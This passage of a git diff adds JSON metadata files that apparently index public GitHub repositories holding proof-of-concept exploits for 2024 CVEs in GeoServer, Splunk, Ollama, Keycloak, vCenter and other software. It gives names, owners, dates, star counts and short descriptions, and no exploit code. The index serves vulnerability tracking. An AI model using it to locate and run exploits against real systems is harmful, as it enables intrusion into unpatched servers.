"https:\/\/github.com\/daniellowrie\/CVE-2024-36401-PoC", + "description": "Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1", + "fork": false, + "created_at": "2024-09-13T10:28:48Z", + "updated_at": "2024-10-12T17:59:41Z", + "pushed_at": "2024-09-26T13:20:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864563382, + "name": "GeoServer-CVE-2024-36401", + "full_name": "punitdarji\/GeoServer-CVE-2024-36401", + "owner": { + "login": "punitdarji", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/punitdarji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/punitdarji\/GeoServer-CVE-2024-36401", + "description": "GeoServer CVE-2024-36401: Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions", + "fork": false, + "created_at": "2024-09-28T14:55:50Z", + "updated_at": "2024-09-30T09:00:33Z", + "pushed_at": "2024-09-28T14:58:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868038376, + "name": "CVE-2024-36401", + "full_name": "netuseradministrator\/CVE-2024-36401", + "owner": { + "login": "netuseradministrator", + "id": 96680088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96680088?v=4", + "html_url": "https:\/\/github.com\/netuseradministrator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netuseradministrator\/CVE-2024-36401", + "description": "geoserver图形化漏洞利用工具", + "fork": false, + "created_at": "2024-10-05T10:08:55Z", + "updated_at": "2025-01-06T06:29:08Z", + "pushed_at": "2024-10-08T03:16:26Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872538624, + "name": "CVE-2024-36401", + "full_name": "kkhackz0013\/CVE-2024-36401", + "owner": { + "login": "kkhackz0013", + "id": 183632565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183632565?v=4", + "html_url": "https:\/\/github.com\/kkhackz0013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkhackz0013\/CVE-2024-36401", + "description": null, + "fork": false, + "created_at": "2024-10-14T15:57:06Z", + "updated_at": "2024-10-14T17:16:07Z", + "pushed_at": "2024-10-14T17:16:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892410177, + "name": "CVE-2024-36401-WoodpeckerPlugin", + "full_name": "thestar0\/CVE-2024-36401-WoodpeckerPlugin", + "owner": { + "login": "thestar0", + "id": 97114131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97114131?v=4", + "html_url": "https:\/\/github.com\/thestar0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thestar0\/CVE-2024-36401-WoodpeckerPlugin", + "description": "CVE-2024-36401-GeoServer Property 表达式注入 Rce woodpecker-framework 插件", + "fork": false, + "created_at": "2024-11-22T03:57:12Z", + "updated_at": "2024-12-18T20:13:38Z", + "pushed_at": "2024-11-23T08:24:26Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892655439, + "name": "cve-2024-36401-poc", + "full_name": "XiaomingX\/cve-2024-36401-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-36401-poc", + "description": "CVE-2024-36401是GeoServer中的一个高危远程代码执行漏洞。GeoServer是一款开源的地理数据服务器软件,主要用于发布、共享和处理各种地理空间数据。 ALIYUN 漏洞原理: 该漏洞源于GeoServer在处理属性名称时,将其不安全地解析为XPath表达式。具体而言,GeoServer调用的GeoTools库API在评估要素类型的属性名称时,以不安全的方式将其传递给commons-jxpath库。由于commons-jxpath库在解析XPath表达式时允许执行任意代码,攻击者可以通过构造特定的输入,利用多个OGC请求参数(如WFS GetFeature、WFS GetPropertyValue、WMS GetMap等),在未经身份验证的情况下远程执行任意代码。 ", + "fork": false, + "created_at": "2024-11-22T14:21:53Z", + "updated_at": "2024-12-08T18:37:21Z", + "pushed_at": "2024-11-22T14:22:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895213731, + "name": "CVE-2024-36401", + "full_name": "0x0d3ad\/CVE-2024-36401", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-36401", + "description": "CVE-2024-36401 (GeoServer Remote Code Execution)", + "fork": false, + "created_at": "2024-11-27T19:13:49Z", + "updated_at": "2024-11-30T19:28:17Z", + "pushed_at": "2024-11-30T19:28:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36416.json b/2024/CVE-2024-36416.json new file mode 100644 index 0000000000..3046fcffae --- /dev/null +++ b/2024/CVE-2024-36416.json @@ -0,0 +1,33 @@ +[ + { + "id": 812538216, + "name": "CVE-2024-36416", + "full_name": "kva55\/CVE-2024-36416", + "owner": { + "login": "kva55", + "id": 60018788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60018788?v=4", + "html_url": "https:\/\/github.com\/kva55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kva55\/CVE-2024-36416", + "description": "Tool for validating \/ testing CVE-2024-36416", + "fork": false, + "created_at": "2024-06-09T07:18:54Z", + "updated_at": "2024-06-15T05:26:59Z", + "pushed_at": "2024-06-15T05:26:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36424.json b/2024/CVE-2024-36424.json new file mode 100644 index 0000000000..e64ffbedca --- /dev/null +++ b/2024/CVE-2024-36424.json @@ -0,0 +1,33 @@ +[ + { + "id": 841733200, + "name": "CVE-2024-36424", + "full_name": "secunnix\/CVE-2024-36424", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-36424", + "description": "K7 Ultimate Security < v17.0.2019 \"K7RKScan.sys\" Null Pointer Dereference PoC ", + "fork": false, + "created_at": "2024-08-13T00:06:17Z", + "updated_at": "2024-11-20T16:31:01Z", + "pushed_at": "2024-08-13T00:26:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36527.json b/2024/CVE-2024-36527.json new file mode 100644 index 0000000000..2e1dc23a4c --- /dev/null +++ b/2024/CVE-2024-36527.json @@ -0,0 +1,33 @@ +[ + { + "id": 817716170, + "name": "CVE-2024-36527", + "full_name": "bigb0x\/CVE-2024-36527", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36527", + "description": "POC for CVE-2024-36527: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal", + "fork": false, + "created_at": "2024-06-20T09:42:07Z", + "updated_at": "2024-12-06T09:40:41Z", + "pushed_at": "2024-06-22T00:50:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36539.json b/2024/CVE-2024-36539.json new file mode 100644 index 0000000000..545e1bbb94 --- /dev/null +++ b/2024/CVE-2024-36539.json @@ -0,0 +1,33 @@ +[ + { + "id": 837496814, + "name": "CVE-2024-36539", + "full_name": "Abdurahmon3236\/CVE-2024-36539", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-36539", + "description": null, + "fork": false, + "created_at": "2024-08-03T06:37:21Z", + "updated_at": "2024-08-03T06:37:57Z", + "pushed_at": "2024-08-03T06:37:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3656.json b/2024/CVE-2024-3656.json new file mode 100644 index 0000000000..f532ed72b2 --- /dev/null +++ b/2024/CVE-2024-3656.json @@ -0,0 +1,33 @@ +[ + { + "id": 871549647, + "name": "CVE-2024-3656", + "full_name": "h4x0r-dz\/CVE-2024-3656", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-3656", + "description": "Keycloak admin API allows low privilege users to use administrative functions", + "fork": false, + "created_at": "2024-10-12T09:17:00Z", + "updated_at": "2024-10-25T06:06:55Z", + "pushed_at": "2024-10-12T09:48:10Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36821.json b/2024/CVE-2024-36821.json new file mode 100644 index 0000000000..eb77f4bce3 --- /dev/null +++ b/2024/CVE-2024-36821.json @@ -0,0 +1,33 @@ +[ + { + "id": 813172649, + "name": "CVE-2024-36821", + "full_name": "IvanGlinkin\/CVE-2024-36821", + "owner": { + "login": "IvanGlinkin", + "id": 64857726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64857726?v=4", + "html_url": "https:\/\/github.com\/IvanGlinkin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IvanGlinkin\/CVE-2024-36821", + "description": "The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821", + "fork": false, + "created_at": "2024-06-10T15:52:02Z", + "updated_at": "2024-11-15T19:16:54Z", + "pushed_at": "2024-06-10T16:07:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36823.json b/2024/CVE-2024-36823.json new file mode 100644 index 0000000000..27418c6510 --- /dev/null +++ b/2024/CVE-2024-36823.json @@ -0,0 +1,33 @@ +[ + { + "id": 882521071, + "name": "CVE-2024-36823-POC", + "full_name": "JAckLosingHeart\/CVE-2024-36823-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-36823-POC", + "description": "Ninja Framework sensitive information leak due to weak encryption", + "fork": false, + "created_at": "2024-11-03T01:56:11Z", + "updated_at": "2024-12-13T06:24:14Z", + "pushed_at": "2024-11-03T01:56:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36837.json b/2024/CVE-2024-36837.json new file mode 100644 index 0000000000..570d7e7ec6 --- /dev/null +++ b/2024/CVE-2024-36837.json @@ -0,0 +1,64 @@ +[ + { + "id": 815626615, + "name": "CVE-2024-36837", + "full_name": "phtcloud-dev\/CVE-2024-36837", + "owner": { + "login": "phtcloud-dev", + "id": 151622760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151622760?v=4", + "html_url": "https:\/\/github.com\/phtcloud-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phtcloud-dev\/CVE-2024-36837", + "description": "CVE-2024-36837 POC", + "fork": false, + "created_at": "2024-06-15T16:44:51Z", + "updated_at": "2025-01-03T02:59:19Z", + "pushed_at": "2024-06-15T17:34:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864484527, + "name": "CVE-2024-36837", + "full_name": "lhc321-source\/CVE-2024-36837", + "owner": { + "login": "lhc321-source", + "id": 176809814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176809814?v=4", + "html_url": "https:\/\/github.com\/lhc321-source", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhc321-source\/CVE-2024-36837", + "description": "CVE-2024-36837 POC", + "fork": false, + "created_at": "2024-09-28T10:44:03Z", + "updated_at": "2024-10-15T02:28:08Z", + "pushed_at": "2024-09-28T10:48:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36842.json b/2024/CVE-2024-36842.json new file mode 100644 index 0000000000..f87b0f9b29 --- /dev/null +++ b/2024/CVE-2024-36842.json @@ -0,0 +1,33 @@ +[ + { + "id": 798261880, + "name": "CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "full_name": "abbiy\/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "owner": { + "login": "abbiy", + "id": 19267773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19267773?v=4", + "html_url": "https:\/\/github.com\/abbiy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abbiy\/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-", + "description": "CVE-2024-36842, Creating Persistent Backdoor on Oncord+ android\/ios car infotaiment using malicious script!", + "fork": false, + "created_at": "2024-05-09T12:28:11Z", + "updated_at": "2024-10-15T04:58:34Z", + "pushed_at": "2024-07-31T10:15:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36877.json b/2024/CVE-2024-36877.json new file mode 100644 index 0000000000..9bccab8cad --- /dev/null +++ b/2024/CVE-2024-36877.json @@ -0,0 +1,64 @@ +[ + { + "id": 840386878, + "name": "CVE-2024-36877", + "full_name": "jjensn\/CVE-2024-36877", + "owner": { + "login": "jjensn", + "id": 5910157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5910157?v=4", + "html_url": "https:\/\/github.com\/jjensn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jjensn\/CVE-2024-36877", + "description": "Exploit POC for CVE-2024-36877", + "fork": false, + "created_at": "2024-08-09T15:33:04Z", + "updated_at": "2025-01-06T08:20:54Z", + "pushed_at": "2024-08-14T15:26:18Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 46, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843925784, + "name": "POC-CVE-2024-36877", + "full_name": "CERTologists\/POC-CVE-2024-36877", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/POC-CVE-2024-36877", + "description": null, + "fork": false, + "created_at": "2024-08-17T20:47:52Z", + "updated_at": "2024-08-17T20:49:57Z", + "pushed_at": "2024-08-17T20:49:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3690.json b/2024/CVE-2024-3690.json new file mode 100644 index 0000000000..50a1c62eb8 --- /dev/null +++ b/2024/CVE-2024-3690.json @@ -0,0 +1,33 @@ +[ + { + "id": 903200657, + "name": "CVE-2024-3690", + "full_name": "taeseongk\/CVE-2024-3690", + "owner": { + "login": "taeseongk", + "id": 102262849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102262849?v=4", + "html_url": "https:\/\/github.com\/taeseongk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taeseongk\/CVE-2024-3690", + "description": null, + "fork": false, + "created_at": "2024-12-14T01:26:56Z", + "updated_at": "2024-12-14T01:44:49Z", + "pushed_at": "2024-12-14T01:44:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36991.json b/2024/CVE-2024-36991.json new file mode 100644 index 0000000000..f365e5f8db --- /dev/null +++ b/2024/CVE-2024-36991.json @@ -0,0 +1,163 @@ +[ + { + "id": 824790619, + "name": "CVE-2024-36991", + "full_name": "bigb0x\/CVE-2024-36991", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36991", + "description": "POC for CVE-2024-36991: This exploit will attempt to read Splunk \/etc\/passwd file.", + "fork": false, + "created_at": "2024-07-06T00:49:40Z", + "updated_at": "2024-12-26T06:26:46Z", + "pushed_at": "2024-07-12T00:41:36Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 113, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 824792553, + "name": "CVE-2024-36991", + "full_name": "Mr-xn\/CVE-2024-36991", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-36991", + "description": "Path Traversal On The \"\/Modules\/Messaging\/\" Endpoint In Splunk Enterprise On Windows", + "fork": false, + "created_at": "2024-07-06T01:00:57Z", + "updated_at": "2024-07-08T13:21:27Z", + "pushed_at": "2024-07-06T01:07:32Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024", + "cve-2024-36991", + "path-traversal", + "splunk" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825033678, + "name": "CVE-2024-36991", + "full_name": "th3gokul\/CVE-2024-36991", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-36991", + "description": "CVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10.", + "fork": false, + "created_at": "2024-07-06T15:24:24Z", + "updated_at": "2024-07-31T07:00:23Z", + "pushed_at": "2024-07-06T15:53:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825068060, + "name": "CVE-2024-36991", + "full_name": "sardine-web\/CVE-2024-36991", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-36991", + "description": "Path traversal vulnerability in Splunk Enterprise on Windows", + "fork": false, + "created_at": "2024-07-06T17:15:39Z", + "updated_at": "2024-07-06T17:24:14Z", + "pushed_at": "2024-07-06T17:24:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826744857, + "name": "CVE-2024-36991", + "full_name": "Cappricio-Securities\/CVE-2024-36991", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-36991", + "description": "Path traversal vulnerability in Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10 that allows reading sensitive files.", + "fork": false, + "created_at": "2024-07-10T09:42:08Z", + "updated_at": "2024-07-21T08:58:48Z", + "pushed_at": "2024-07-10T09:42:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37032.json b/2024/CVE-2024-37032.json new file mode 100644 index 0000000000..26bd53aaa2 --- /dev/null +++ b/2024/CVE-2024-37032.json @@ -0,0 +1,64 @@ +[ + { + "id": 820213005, + "name": "CVE-2024-37032", + "full_name": "Bi0x\/CVE-2024-37032", + "owner": { + "login": "Bi0x", + "id": 20492440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20492440?v=4", + "html_url": "https:\/\/github.com\/Bi0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bi0x\/CVE-2024-37032", + "description": "Path traversal in Ollama with rogue registry server", + "fork": false, + "created_at": "2024-06-26T03:11:29Z", + "updated_at": "2024-12-14T21:15:50Z", + "pushed_at": "2024-06-28T03:14:05Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826686892, + "name": "CVE-2024-37032-scanner", + "full_name": "ahboon\/CVE-2024-37032-scanner", + "owner": { + "login": "ahboon", + "id": 7101707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7101707?v=4", + "html_url": "https:\/\/github.com\/ahboon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahboon\/CVE-2024-37032-scanner", + "description": "CVE-2024-37032 scanner", + "fork": false, + "created_at": "2024-07-10T07:24:09Z", + "updated_at": "2024-07-10T15:15:38Z", + "pushed_at": "2024-07-10T07:26:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37051.json b/2024/CVE-2024-37051.json new file mode 100644 index 0000000000..9a2e06881f --- /dev/null +++ b/2024/CVE-2024-37051.json @@ -0,0 +1,68 @@ +[ + { + "id": 813723501, + "name": "CVE-2024-37051-EXP", + "full_name": "LeadroyaL\/CVE-2024-37051-EXP", + "owner": { + "login": "LeadroyaL", + "id": 9478918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478918?v=4", + "html_url": "https:\/\/github.com\/LeadroyaL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeadroyaL\/CVE-2024-37051-EXP", + "description": "CVE-2024-37051 poc and exploit", + "fork": false, + "created_at": "2024-06-11T16:01:13Z", + "updated_at": "2024-11-26T12:01:27Z", + "pushed_at": "2024-06-11T19:02:40Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-37051", + "exploit", + "payload" + ], + "visibility": "public", + "forks": 5, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814572729, + "name": "CVE-2024-37051", + "full_name": "mrblackstar26\/CVE-2024-37051", + "owner": { + "login": "mrblackstar26", + "id": 93428115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93428115?v=4", + "html_url": "https:\/\/github.com\/mrblackstar26", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrblackstar26\/CVE-2024-37051", + "description": "Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051)", + "fork": false, + "created_at": "2024-06-13T09:15:58Z", + "updated_at": "2024-06-13T09:22:33Z", + "pushed_at": "2024-06-13T09:22:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37081.json b/2024/CVE-2024-37081.json new file mode 100644 index 0000000000..0968fc2e19 --- /dev/null +++ b/2024/CVE-2024-37081.json @@ -0,0 +1,133 @@ +[ + { + "id": 825088581, + "name": "CVE-2024-37081", + "full_name": "mbadanoiu\/CVE-2024-37081", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-37081", + "description": "CVE-2024-37081: Multiple Local Privilege Escalation in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T18:29:13Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-06T18:38:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + 